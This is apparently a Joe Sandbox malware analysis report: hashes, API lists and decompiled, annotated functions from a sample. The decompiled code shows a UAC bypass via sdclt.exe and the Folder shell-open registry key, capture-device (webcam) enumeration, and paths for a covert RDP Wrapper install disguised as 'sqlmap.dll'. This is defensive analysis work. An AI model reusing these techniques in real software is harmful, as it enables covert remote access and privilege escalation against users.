reservations$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2
$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 4275171209-94128256
                                      • Opcode ID: ef4d03fe8b7e0ecf86cd628faa2371a4c098569ff260e7992737a7b82c618b8a
                                      • Instruction ID: 85f185384def0afd7ead37903f8a641be40241f7e11d683bc6579871d39cb5e7
                                      • Opcode Fuzzy Hash: ef4d03fe8b7e0ecf86cd628faa2371a4c098569ff260e7992737a7b82c618b8a
                                      • Instruction Fuzzy Hash: 15F27FFAA503417EEB017369AC03F3E316DC783B54F584948BA24AA3D3E576E9245378
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: 7$g_32969$g_33076$g_33266$g_33291$g_33331$g_33450$g_33784[i]$g_33906$g_34033[i][j]$g_34059$g_34335.f0$g_34335.f1$g_34335.f2$g_34335.f3$g_34335.f4$g_34597$g_34732.f0$g_34732.f1$g_34732.f2$g_34732.f3$g_34732.f4$g_34741$g_34858.f0$g_34858.f1$g_34858.f2$g_34858.f3$g_34858.f4$g_35067[i][j][k][l]$g_35113$g_35507$g_35613$g_35689$g_35997$g_36187$g_36207[i][j][k][l]$g_36312$g_36345$g_36361$g_36436$g_36525$g_36532[i][j]$g_36590[i]$g_36642$g_36953$g_37038$g_37257[i][j][k]$g_37445[i][j]$g_37452$g_37527$g_37537$g_37541$g_37560$g_37723$g_37892[i][j][k][l]$g_37946[i]$g_38136$g_38176$g_38237$g_38283$g_38304$g_38365$g_38536$g_38649[i][j]$g_38652$g_38688$g_38701$g_38723$g_38756$g_38758$g_38769[i]$g_38773$g_38775$g_38781$g_38782[i]$g_38790[i][j]$g_38794$g_38920$g_38925$g_39006$g_39046$g_39047$g_39180$g_39383$g_39385[i][j][k]$g_39448[i]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]
                                      • API String ID: 3472027048-4294153300
                                      • Opcode ID: 7796fc7bf4f7ede429a0869c31b5b1a287679219d77e27f19c11f411f5695e85
                                      • Instruction ID: 5e51fc1f676e758e5dffad4b191ddfb70bfada9d2f00399e4ce0ea8a6f2967b7
                                      • Opcode Fuzzy Hash: 7796fc7bf4f7ede429a0869c31b5b1a287679219d77e27f19c11f411f5695e85
                                      • Instruction Fuzzy Hash: B8A28EB5D00204FFEB04EB99DC86EBE7779EB86704F14858DF61197342E630AA50EB61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000019B6), ref: 00CC19AF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 5bfc31e259196772668c4016f50537dc4c824d3831615682554ba3a335b58f4f
                                      • Instruction ID: 1590faadc88476ce92982334ce7e296e9b4115c1cddb4637cd73d6111876343f
                                      • Opcode Fuzzy Hash: 5bfc31e259196772668c4016f50537dc4c824d3831615682554ba3a335b58f4f
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E004411D0(void* __edx, void* __edi, void* __eflags) {
                                      				char _v584;
                                      				char _v600;
                                      				char _v1112;
                                      				short _v1132;
                                      				intOrPtr _v1212;
                                      				char _v1216;
                                      				char _v1228;
                                      				char _v1232;
                                      				char _v1248;
                                      				intOrPtr _v1264;
                                      				intOrPtr _v1272;
                                      				intOrPtr _v1280;
                                      				intOrPtr _v1296;
                                      				intOrPtr _v1304;
                                      				char _v1308;
                                      				char _v1312;
                                      				int _v1320;
                                      				char _v1328;
                                      				void* _v1332;
                                      				char _v1336;
                                      				char _v1340;
                                      				char _v1344;
                                      				char _v1348;
                                      				intOrPtr _v1360;
                                      				void* __ebx;
                                      				void* _t80;
                                      				void* _t82;
                                      				void* _t83;
                                      				void* _t86;
                                      				char* _t100;
                                      				void* _t104;
                                      				void* _t105;
                                      				void* _t110;
                                      
                                      				_t110 = __eflags;
                                      				_t105 = __edi;
                                      				_t104 = __edx;
                                      				_v1328 = 0xa;
                                      				_v1320 = 0;
                                      				E00435779( &_v1308);
                                      				E0043F43F( &_v1228);
                                      				E00431085(GetTickCount());
                                      				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1332,  &_v1320); // executed
                                      				RegSetValueExA(_v1332, "MaxConnectionsPer1_0Server", 0, 4,  &_v1328, 4); // executed
                                      				RegSetValueExA(_v1332, "MaxConnectionsPerServer", 0, 4,  &_v1328, 4); // executed
                                      				RegCloseKey(_v1332); // executed
                                      				E004355A0( &_v1308, _t104, _t110); // executed
                                      				E0043F2AD( &_v1228, _t104, _t110,  &_v1308); // executed
                                      				_t94 =  &_v584;
                                      				E00434B0F( &_v584, _t104, _t110,  &_v1312,  &_v1232); // executed
                                      				E00431052( &_v1112, 0, 0x208);
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1112, _t86); // executed
                                      				lstrcatW( &_v1132, L"\\Microsoft Vision\\");
                                      				CreateDirectoryW( &_v1132, 0); // executed
                                      				if(_v1280 != 0) {
                                      					_t82 = E0043DB97(); // executed
                                      					if(_t82 != 1) {
                                      						_t83 = E0043D4B8();
                                      						_t113 = _t83 - 0xa;
                                      						if(_t83 != 0xa) {
                                      							E0043F843(0,  &_v584, __eflags);
                                      						} else {
                                      							E0043F8C0(_t104, _t113);
                                      						}
                                      					}
                                      				}
                                      				if(_v1264 != 0) {
                                      					_t80 = E0043DB97();
                                      					_t115 = _t80 - 1;
                                      					if(_t80 == 1) {
                                      						E00440D9D(_t94, _t115);
                                      					}
                                      				}
                                      				_t116 = _v1212;
                                      				if(_v1212 != 0) {
                                      					L11:
                                      					__eflags = _v1272;
                                      					if(__eflags != 0) {
                                      						E0043FCD9();
                                      					}
                                      					E00434A83( &_v600, _t104, __eflags); // executed
                                      					goto L14;
                                      				} else {
                                      					E0043F0C8( &_v1248, _t116, _v1304, _v1296);
                                      					_t117 = _v1312;
                                      					if(_v1312 == 0) {
                                      						goto L11;
                                      					} else {
                                      						_v1336 = 0;
                                      						_t100 =  &_v1344;
                                      						E0043345A(_t100,  &_v1216);
                                      						_push(_t100);
                                      						E0043EB77( &_v1336, _t117,  &_v1348,  &_v1340);
                                      						E00435A2D(_v1360);
                                      						E00435A2D(0);
                                      						L14:
                                      						E00434820( &_v600, _t105, _t117);
                                      						E0043F069( &_v1248);
                                      						E0043579E( &_v1328, _t105);
                                      						return 0;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004411FD
                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00441227
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00441240
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00441259
                                      • RegCloseKey.KERNEL32(?), ref: 00441263
                                        • Part of subcall function 004355A0: Sleep.KERNEL32(000001F4,?,?,00000000), ref: 004355B6
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004412B9
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004412CC
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004412DB
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043D4B8: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D4D0
                                        • Part of subcall function 0043D4B8: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D4E0
                                        • Part of subcall function 0043F8C0: GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0043F8E2
                                        • Part of subcall function 0043F8C0: IsWow64Process.KERNEL32(00000000), ref: 0043F8E9
                                        • Part of subcall function 0043F8C0: GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0043F920
                                        • Part of subcall function 0043F8C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043F952
                                        • Part of subcall function 0043F8C0: lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0043F964
                                        • Part of subcall function 0043F8C0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043F97C
                                        • Part of subcall function 0043F8C0: ShellExecuteExW.SHELL32(?), ref: 0043F9AE
                                        • Part of subcall function 0043F8C0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0043F9B8
                                        • Part of subcall function 0043F8C0: Sleep.KERNEL32(000007D0), ref: 0043F9D0
                                        • Part of subcall function 0043F8C0: RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0043F9E0
                                        • Part of subcall function 0043F8C0: ExitProcess.KERNEL32 ref: 0043F9E7
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 0044121D
                                      • \Microsoft Vision\, xrefs: 004412BF
                                      • MaxConnectionsPer1_0Server, xrefs: 00441237
                                      • MaxConnectionsPerServer, xrefs: 00441250
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentDirectoryExecuteShellSleepTokenValuelstrcat$AddressCountDeleteExitFileFolderHandleInformationLibraryLoadModuleNameOpenPathProcSystemTerminateTickWow64
                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                      • API String ID: 2133878423-2552559493
                                      • Opcode ID: 2aa71526f58341c87374b3035a7e9d146eabac71b71e1cb94b081245bb7a7c7c
                                      • Instruction ID: 91789f247b27ab9b108eed654d3fb21c2abac9c5050226b34724df1408aa4825
                                      • Opcode Fuzzy Hash: 2aa71526f58341c87374b3035a7e9d146eabac71b71e1cb94b081245bb7a7c7c
                                      • Instruction Fuzzy Hash: 60416371404345ABE324EFA1DC85EAFB7ECBF98305F40193FB69181461DB789948CB5A
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Control-flow Graph

C-Code - Quality: 59%
			// Enumerates a class of COM objects and collects a display name for each.
			// The vtable slots used (0x0c on the CoCreateInstance result, 0x0c/0x14 on
			// the enumerator, 0x24 on each enumerated item, 0x0c on the bound storage)
			// together with the property names "Description"/"FriendlyName" match the
			// DirectShow ICreateDevEnum -> IEnumMoniker -> IMoniker::BindToStorage(IID_IPropertyBag)
			// -> IPropertyBag::Read idiom used to list capture devices. The CLSID/IIDs at
			// 0x4425a0, 0x444834, 0x442590 and 0x442520 are not shown in this dump, so that
			// identification is inferred from the call pattern, not read from the GUIDs.
			E004406D5(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;                         // this; the records built below are appended to the list at this+4
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;                             // bound property bag
				_v12 = 0;                             // enumerator factory (CoCreateInstance result)
				_v8 = 0;                              // enumerator
				__imp__CoCreateInstance(0x4425a0, 0, 1, 0x444834, _t43); // executed; dwClsContext 1 = CLSCTX_INPROC_SERVER, object returned in _v12
				_t66 = _v12;
				if(_t66 != 0) {
					// vtable slot 3 (0x0c): CreateClassEnumerator(category CLSID at 0x442590, &_v8, 0)
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x442590,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);   // slot 5 (0x14): IEnumMoniker::Reset
						_t64 = 0;                                 // zero-based index stored in each record
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							// slot 3 (0x0c): Next(1, &_v24, &_v20); any non-zero HRESULT (S_FALSE at end of enumeration) leaves the loop
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;    // decompiler renders the single moniker returned by Next as an indexed access
							// slot 9 (0x24): IMoniker::BindToStorage(NULL, NULL, riid at 0x442520, &_v16)
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x442520,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);         // OLEAUT32 ordinal 8 = VariantInit (resolved under APIs below); _v44 is the VARIANT
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							// slot 3 (0x0c): IPropertyBag::Read(L"Description", &_v44, NULL)
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00435ADB(_t73) == 0) {     // E00435ADB is the HeapAlloc wrapper (see the subcall notes of the next function): 0x1c-byte record
									_t85 = _t87;               // allocation failed: NULL record; the stores below would then fault
								} else {
									_t85 = E0044098D(_t56);    // record set-up; _t56 is undeclared, a decompiler artefact
								}
								_t88 = _v36;                   // VARIANT at _v44: +8 is bstrVal, the BSTR returned by Read
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;       // record+8 = device index
									E0043239F(_v28 + 4, _t85); // append the record to the caller's list
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										// Copy the name twice: as UTF-16 into the buffer at record+4 and,
										// truncated to the low byte, into the 8-bit buffer at record+0.
										// _t87 is the character index; this loop writes no terminator.
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							// "Description" is not available for this item: fall back to "FriendlyName" through the same Read slot
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						// slot 2 (0x08): Release on the enumerator and on the factory. Not released:
						// the property bag (_v16) and the moniker (_v24) of each iteration, and the
						// VARIANT is never cleared, so every enumerated item leaks.
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				// Early exits (no object from CoCreateInstance or no enumerator) skip
				// CoUninitialize, so the COM initialisation is left unbalanced on that path.
				return _t43;
			}

Statement addresses (the per-statement address column of the listing, detached from the code by extraction): 0x004406de to 0x00440830.

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 004406E4
                                      • CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 00440704
                                      • VariantInit.OLEAUT32(?), ref: 00440760
                                      • CoUninitialize.OLE32 ref: 00440826
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                      • String ID: Description$FriendlyName
                                      • API String ID: 4142528535-3192352273
                                      • Opcode ID: 671c1dea1cc5a47620d9b3a300dc35bc6e15fe4e95a975526f78cf3955704192
                                      • Instruction ID: 93afb7116fd28a642984587422d658e1fe89e428312645c93fddd83b126eb9f9
                                      • Opcode Fuzzy Hash: 671c1dea1cc5a47620d9b3a300dc35bc6e15fe4e95a975526f78cf3955704192
                                      • Instruction Fuzzy Hash: 83412178A00205AFEB14DFA5C984EAFBBB9EFC9704B14445EF505EB250DB78E901CB64
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Control-flow Graph

C-Code - Quality: 79%
			// One-time initialisation of the RDP component's globals. It builds the
			// install paths of an RDP Wrapper deployment: "rdpwrap.ini" is the
			// configuration file of the open-source RDP Wrapper Library, "TermService"
			// is the Remote Desktop Services service that library hooks, and the wrapper
			// DLL is stored as "sqlmap.dll" under "<Program Files>\Microsoft DN1". How the
			// DLL is wired into TermService is not part of this function.
			E0043C987(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t6;
				void* _t9;
				void* _t10;
				void* _t14;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t50;
				intOrPtr _t53;
				void* _t62;

				_t50 = __edx;
				_push(__ecx);
				InitializeCriticalSection(0x447cd8);       // the lock is the first field of the global block whose address is returned below
				_t53 = 5;
				asm("xorps xmm0, xmm0");
				 *0x447d24 = _t53;
				 *0x447d1c = _t53;
				_t31 = 0x18;
				asm("movups [0x447cf0], xmm0");             // zero the global string slots (0x447cf0.., 0x447d00, 0x447d08.., 0x447d20)
				 *0x447d00 = 0;
				asm("movups [0x447d08], xmm0");
				 *0x447d20 = 0;
				_t6 = E00435ADB(_t31);                     // HeapAlloc(0x18) via GetProcessHeap (see subcall notes below)
				if(_t6 == 0) {
					_t32 = 0;
				} else {
					 *_t6 = _t53;                          // first dword = 5 ...
					_t1 = _t6 + 4; // 0x4
					_t32 = _t1;
					asm("stosd");                          // ... followed by five zeroed dwords (5 x 4 = 20 bytes, 0x18 in total)
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x447d18 = _t32;                         // pointer to the zeroed dword array (NULL on allocation failure)
				 *0x447d30 = 0;
				 *0x447d34 = 0; // executed
				// E0043312C assigns a wide literal to a global string slot (inferred from use).
				E0043312C(0x447d00, _t50, L"TermService"); // executed
				_t54 = L"%ProgramFiles%";
				E0043312C(0x447d0c, _t50, L"%ProgramFiles%"); // executed
				_t9 = E0043DBF3(0x447d0c); // executed; check on the environment, body not shown
				_t65 = _t9 - 1;
				if(_t9 != 1) {
					// E00433001 = ExpandEnvironmentStringsW into a temporary buffer, E00433264 = lstrcpyW
					// into the slot, E00435A2D = VirtualFree of the temporary (subcall notes below)
					_t51 = 0x447d0c;
					_t10 = E00433001( &_v8, 0x447d0c, __eflags); // executed
					_t62 = 0x447d10;
					E00433264(0x447d10, _t10); // executed; 0x447d10 = expanded %ProgramFiles%
					E00435A2D(_v8);
				} else {
					// %ProgramW6432% exists only for 32-bit processes on 64-bit Windows and names the
					// 64-bit Program Files, so E0043DBF3() == 1 presumably means "running under WOW64".
					E0043312C(0x447d0c, _t50, L"%ProgramW6432%");
					_t51 = 0x447d0c;
					_t22 = E00433001( &_v8, 0x447d0c, _t65);
					_t62 = 0x447d10;
					E00433264(0x447d10, _t22);               // 0x447d10 = expanded %ProgramW6432%
					E00435A2D(_v8);
					E0043312C(0x447d0c, 0x447d0c, _t54);     // 0x447d0c back to the unexpanded "%ProgramFiles%" template
				}
				// E00433297 appends a wide literal to a global string slot.
				_t55 = L"\\Microsoft DN1";
				E00433297(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed; 0x447d10 = "<Program Files>\Microsoft DN1"
				_t14 = E00433297(0x447d0c, _t51, _t65, _t55); // executed; 0x447d0c = "%ProgramFiles%\Microsoft DN1"
				E0043D70F(_t14, _t62);                        // acts on the directory path; body not shown
				E00433264(0x447d14, _t62); // executed; 0x447d14 = copy of the directory path
				E00433297(0x447d14, _t51, _t65, L"\\rdpwrap.ini"); // executed; 0x447d14 = "<Program Files>\Microsoft DN1\rdpwrap.ini"
				_t57 = L"\\sqlmap.dll";
				E00433297(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed; 0x447d10 = "<Program Files>\Microsoft DN1\sqlmap.dll"
				E00433297(0x447d0c, _t51, _t65, _t57); // executed; 0x447d0c = "%ProgramFiles%\Microsoft DN1\sqlmap.dll", kept unexpanded
				return 0x447cd8;
			}

Statement addresses (the per-statement address column of the listing, detached from the code by extraction): 0x0043c987 to 0x0043cac9.

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00447CD8), ref: 0043C993
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                        • Part of subcall function 00433001: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00433034
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
Memory Dump Source
• Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true (associated dumps as listed for the E004406D5 entry above)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
